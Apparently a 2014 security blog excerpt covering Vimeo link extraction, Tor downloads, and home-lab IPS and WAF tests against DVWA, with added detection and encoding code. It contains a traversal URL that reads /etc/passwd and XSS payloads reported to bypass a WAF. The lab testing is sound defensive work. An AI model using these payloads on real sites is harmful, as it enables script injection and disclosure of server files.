Thursday, October 2, 2014

Vimeo-no-access-to-full-access

I came across a situation where I had a valid Vimeo video link, but Vimeo would not allow it to be viewed online!

The rest is explained below in pictures.

First, when I tried to access it in the browser, it did not work.

Then I pasted the link into http://www.videograbber.net/free-vimeo-downloader

I was easily able to download the video :D


**Contents hidden due to privacy issues ...

How did I get the links?

They were from a web site: I just saved the page source (as vimeo.txt) and ran the following command on Linux to get the Vimeo links. Each awk stage splits on a delimiter: first on src=, then on the quote before the frameborder attribute, and finally on the quote character itself, leaving only the URL from the src attribute:

grep vimeo vimeo.txt | awk -F'src=' '{print $2}' | awk -F'" frame' '{print $1}' | awk -F'"' '{print $2}'
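The same extraction with a real HTML tokenizer instead of the grep/awk chain, as an added example that is not part of the original post: it does not depend on attribute order or on which attribute follows src, and it also picks up plain links to vimeo.com. The sample page and the video ID 123456789 are constructed for the example.

```python
# Added example (not from the original post): pull Vimeo player URLs out of a
# saved page source with Python's HTML tokenizer, so attribute order and
# quoting style do not matter the way they do for a grep/awk chain.
from html.parser import HTMLParser


class VimeoLinkFinder(HTMLParser):
    """Collect src/href values that point at vimeo.com or player.vimeo.com."""

    def __init__(self):
        super().__init__()
        self.links = []

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            if name in ("src", "href") and value and "vimeo.com" in value.lower():
                # protocol-relative embeds ("//player.vimeo.com/...") are common
                if value.startswith("//"):
                    value = "https:" + value
                if value not in self.links:
                    self.links.append(value)


def find_vimeo_links(html_text):
    """Return the Vimeo URLs found in html_text, in document order."""
    parser = VimeoLinkFinder()
    parser.feed(html_text)
    parser.close()
    return parser.links


# Constructed sample of a saved page; the video ID 123456789 is made up.
SAMPLE_PAGE = """
<html><body>
<p>Lecture 1</p>
<iframe width="500" height="281" src="//player.vimeo.com/video/123456789?title=0"
        frameborder="0" allowfullscreen></iframe>
<a href='https://vimeo.com/123456789'>watch on Vimeo</a>
<iframe src="https://www.youtube.com/embed/abc"></iframe>
</body></html>
"""

if __name__ == "__main__":
    # for a saved page: find_vimeo_links(open("vimeo.txt", encoding="utf-8").read())
    for link in find_vimeo_links(SAMPLE_PAGE):
        print(link)
```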

Tuesday, September 30, 2014

Kali-Tor-Blocked-Content-download

Just a snapshot of downloading blocked content (blocked by an organization, ISP, government, country, etc.) on Kali using the Tor network.


Labels: TOR, torsocks, Blocked Contents, Kali, Tails Linux
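A check a practitioner would want before pulling a blocked file through torsocks, as an added example that is not part of the original post: confirm that the request really leaves through a Tor exit (check.torproject.org reports whether the client IP is a relay) before fetching anything. It assumes the tor package's default SocksPort 9050 on localhost and that torsocks and curl are installed; the sample JSON replies in the test are constructed.

```python
# Added example (not from the original post): verify that torsocks routes
# traffic over Tor before downloading blocked content on Kali.
import json
import socket
import subprocess

TOR_SOCKS = ("127.0.0.1", 9050)      # default SocksPort of the tor package (assumption)
TOR_CHECK_URL = "https://check.torproject.org/api/ip"


def tor_socks_listening(host=TOR_SOCKS[0], port=TOR_SOCKS[1], timeout=2.0):
    """True if something accepts TCP connections on the Tor SOCKS port."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        return False


def is_tor_reply(body):
    """Parse the JSON reply of check.torproject.org/api/ip, e.g.
    {"IsTor":true,"IP":"198.51.100.7"}; True only if IsTor is exactly true."""
    try:
        reply = json.loads(body)
    except (ValueError, TypeError):
        return False
    return isinstance(reply, dict) and reply.get("IsTor") is True


def torsocks_cmd(url, out_path=None):
    """argv for fetching url through torsocks. Only the TCP connections curl
    makes via libc are wrapped; UDP and raw sockets are not covered."""
    cmd = ["torsocks", "curl", "--silent", "--location", "--fail"]
    if out_path:
        cmd += ["--output", out_path]
    return cmd + [url]


def tor_fetch(url, out_path):
    """Refuse to download unless the Tor check confirms the exit is a relay."""
    if not tor_socks_listening():
        raise RuntimeError("tor is not listening on %s:%d; start the tor service" % TOR_SOCKS)
    probe = subprocess.run(torsocks_cmd(TOR_CHECK_URL), capture_output=True, text=True)
    if probe.returncode != 0 or not is_tor_reply(probe.stdout):
        raise RuntimeError("traffic is not going through Tor, refusing to fetch")
    subprocess.run(torsocks_cmd(url, out_path), check=True)
    return out_path


if __name__ == "__main__":
    import sys
    # usage: python tor_fetch.py https://example.org/blocked.pdf blocked.pdf
    print(tor_fetch(sys.argv[1], sys.argv[2]))
```

The probe is deliberately made through the same torsocks wrapper as the download, so a misconfigured wrapper (tor not running, wrong SOCKS port) fails the check instead of silently fetching over the direct connection.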

Monday, September 29, 2014

IBM Security Network Protection

IBM Security Network Protection (IPS/IDS)

Downloaded the following from the IBM site:

1. VMware image of the IBM Security Network Protection (XGS) Virtual Appliance for demo.
2. 30-day license for all features, functionality and updates.
3. Demo Setup Guide for ISNP (XGS) Virtual Appliance.

VM settings for IBM Security Network Protection


The custom interface /dev/vmnet4 is crucial in this configuration: the appliance works in bridge (sniffing) mode on it, so all traffic to the protected VM passes through the IPS and can be inspected or blocked.


VM settings for DVWA (live CD)

DVWA is accessed through the IPS/IDS bridge.

Sample application access monitoring and a blocked URL.



Event log entry created

URL that generated the file-access IPS entry (DVWA's file inclusion page with a directory traversal to /etc/passwd): http://192.168.116.133/vulnerabilities/fi/?page=../../../../../../../../../../etc/passwd
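Detection logic for the kind of request the XGS logged above, as an added example that is not part of the original post and not IBM's signatures (the appliance's rule set is not known from the post): it scans Apache-style access log lines for traversal and sensitive-file access, including percent-encoded and double-encoded forms that a naive string match on "../" would miss. The log lines are constructed; 192.168.116.133 is the DVWA host from the post.

```python
# Added example (not from the original post): flag LFI / path traversal
# attempts such as ?page=../../../../etc/passwd in access log lines,
# after normalising percent-encoding so ..%2f and %252e%252e%252f are caught.
import re
from urllib.parse import unquote

# Constructed sample log; the second to fourth lines are traversal attempts.
SAMPLE_LOG = """\
192.168.116.1 - - [29/Sep/2014:10:01:02 +0000] "GET /vulnerabilities/fi/?page=include.php HTTP/1.1" 200 1532
192.168.116.1 - - [29/Sep/2014:10:01:09 +0000] "GET /vulnerabilities/fi/?page=../../../../../../../../../../etc/passwd HTTP/1.1" 200 2041
192.168.116.1 - - [29/Sep/2014:10:01:15 +0000] "GET /vulnerabilities/fi/?page=..%2f..%2f..%2fetc%2fpasswd HTTP/1.1" 200 2041
192.168.116.1 - - [29/Sep/2014:10:01:21 +0000] "GET /vulnerabilities/fi/?page=%252e%252e%252f%252e%252e%252fetc%252fpasswd HTTP/1.1" 200 2041
192.168.116.1 - - [29/Sep/2014:10:01:30 +0000] "GET /images/logo.png HTTP/1.1" 200 512
"""

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[\d.]+"')
TRAVERSAL_RE = re.compile(r"\.\./")
SENSITIVE_RE = re.compile(r"/etc/(?:passwd|shadow)|boot\.ini|win\.ini", re.IGNORECASE)


def normalise_path(raw):
    """Percent-decode until the string stops changing (bounded to three
    rounds to defeat double/triple encoding), then unify backslashes so
    ..\\ and ..%5c are seen as traversal too."""
    decoded = raw
    for _ in range(3):
        nxt = unquote(decoded)
        if nxt == decoded:
            break
        decoded = nxt
    return decoded.replace("\\", "/")


def classify_request(path):
    """Return the reasons this request path looks like an LFI attempt."""
    norm = normalise_path(path)
    reasons = []
    if TRAVERSAL_RE.search(norm):
        reasons.append("path traversal")
    if SENSITIVE_RE.search(norm):
        reasons.append("sensitive file")
    return reasons


def scan_access_log(text):
    """Return (client_ip, raw_path, reasons) for every suspicious line."""
    hits = []
    for line in text.splitlines():
        m = REQUEST_RE.search(line)
        if not m:
            continue
        reasons = classify_request(m.group("path"))
        if reasons:
            hits.append((line.split()[0], m.group("path"), reasons))
    return hits


if __name__ == "__main__":
    for ip, path, reasons in scan_access_log(SAMPLE_LOG):
        print(ip, path, ", ".join(reasons))
```

Decoding before matching is the point: an inline IPS that matches only the literal "../" would miss the encoded variants, which is exactly the class of evasion to test the appliance against after confirming it catches the plain request.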

Wednesday, September 24, 2014

Demonstrating-WebApplicationFirewall

The WAF was able to block almost all attacks against the Damn Vulnerable Web Application.
The attacks were generated with Burp Suite Professional, Acunetix, and manually from Burp.

Alerts created on the WAF during the web attack:

SQL injection alert details

XSS alert and block

Example blocking of attacks (video)

Bypassing of WAF

I am trying to bypass the WAF (successful bypasses will be listed below).

The following payloads were able to bypass the WAF. The web application is DVWA.

http://192.168.77.200/vulnerabilities/xss_r/?name=%27%3E%3Cmarquee/onstart=confirm%282%29%3E/

http://192.168.77.200/vulnerabilities/xss_r/?name='><marquee/onstart=confirm(1)>

http://192.168.77.200/vulnerabilities/xss_r/?name='><svg/onload=prompt(1);>
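Why payloads like these get past a signature-based filter, as an added example that is not part of the original post and does not reproduce the tested WAF's rules (which the post does not give): a hypothetical blacklist of the common kind, which expects whitespace before an event handler and only knows the usual handler names, is shown next to a tokenizer-based check that sees "marquee/onstart" as a tag with an on* attribute, and next to the output encoding that actually fixes DVWA's reflected XSS. The blacklist patterns and the two textbook payloads are assumptions for the demonstration; the three bypass payloads are the ones listed above.

```python
# Added example (not from the original post, not the tested WAF's rule set):
# a hypothetical signature blacklist versus a tokenizer check versus output
# encoding, run over the bypass payloads listed in the post.
import html
import re
from html.parser import HTMLParser
from urllib.parse import unquote

# Hypothetical blacklist: common handlers only, whitespace expected before them.
BLACKLIST = re.compile(
    r"<\s*script|javascript:|\s+on(?:error|click|mouseover|load)\s*=|alert\s*\(",
    re.IGNORECASE,
)


def blacklist_blocks(value):
    """What a naive signature rule sees: decode once, then regex-match."""
    return bool(BLACKLIST.search(unquote(value)))


class ActiveContentFinder(HTMLParser):
    """Flag any tag carrying an on* handler or a javascript: URL, however the
    attribute is separated from the tag name ('/', whitespace, newline)."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag in ("script", "iframe", "object", "embed"):
            self.findings.append(tag)
        for name, value in attrs:
            if name.startswith("on"):
                self.findings.append("%s@%s" % (name, tag))
            elif name in ("href", "src", "action") and value and \
                    value.strip().lower().startswith("javascript:"):
                self.findings.append("%s=javascript:@%s" % (name, tag))

    handle_startendtag = handle_starttag


def parser_findings(value):
    """Tokenize the decoded input the way a browser would and list findings."""
    finder = ActiveContentFinder()
    finder.feed(unquote(value))
    finder.close()
    return finder.findings


def render_name(name):
    """The real fix for the reflected XSS: encode the value on output."""
    return "<pre>Hello " + html.escape(name, quote=True) + "</pre>"


PAYLOADS = [
    "<script>alert(1)</script>",                       # textbook (assumed), blocked
    "<img src=x onerror=alert(1)>",                    # textbook (assumed), blocked
    "%27%3E%3Cmarquee/onstart=confirm%282%29%3E/",     # from the post
    "'><marquee/onstart=confirm(1)>",                  # from the post
    "'><svg/onload=prompt(1);>",                       # from the post
]

if __name__ == "__main__":
    for p in PAYLOADS:
        print("%-45s blacklist=%-5s parser=%s" % (p, blacklist_blocks(p), parser_findings(p)))
    print(render_name("'><svg/onload=prompt(1);>"))
```

The blacklist stops the two textbook payloads and passes all three from the post, because "/" is a valid separator between a tag name and its first attribute and onstart is not on the list; the tokenizer reports the handler in every case, and the encoded output never contains a tag at all, which is why DVWA's own high-security fix is encoding rather than filtering.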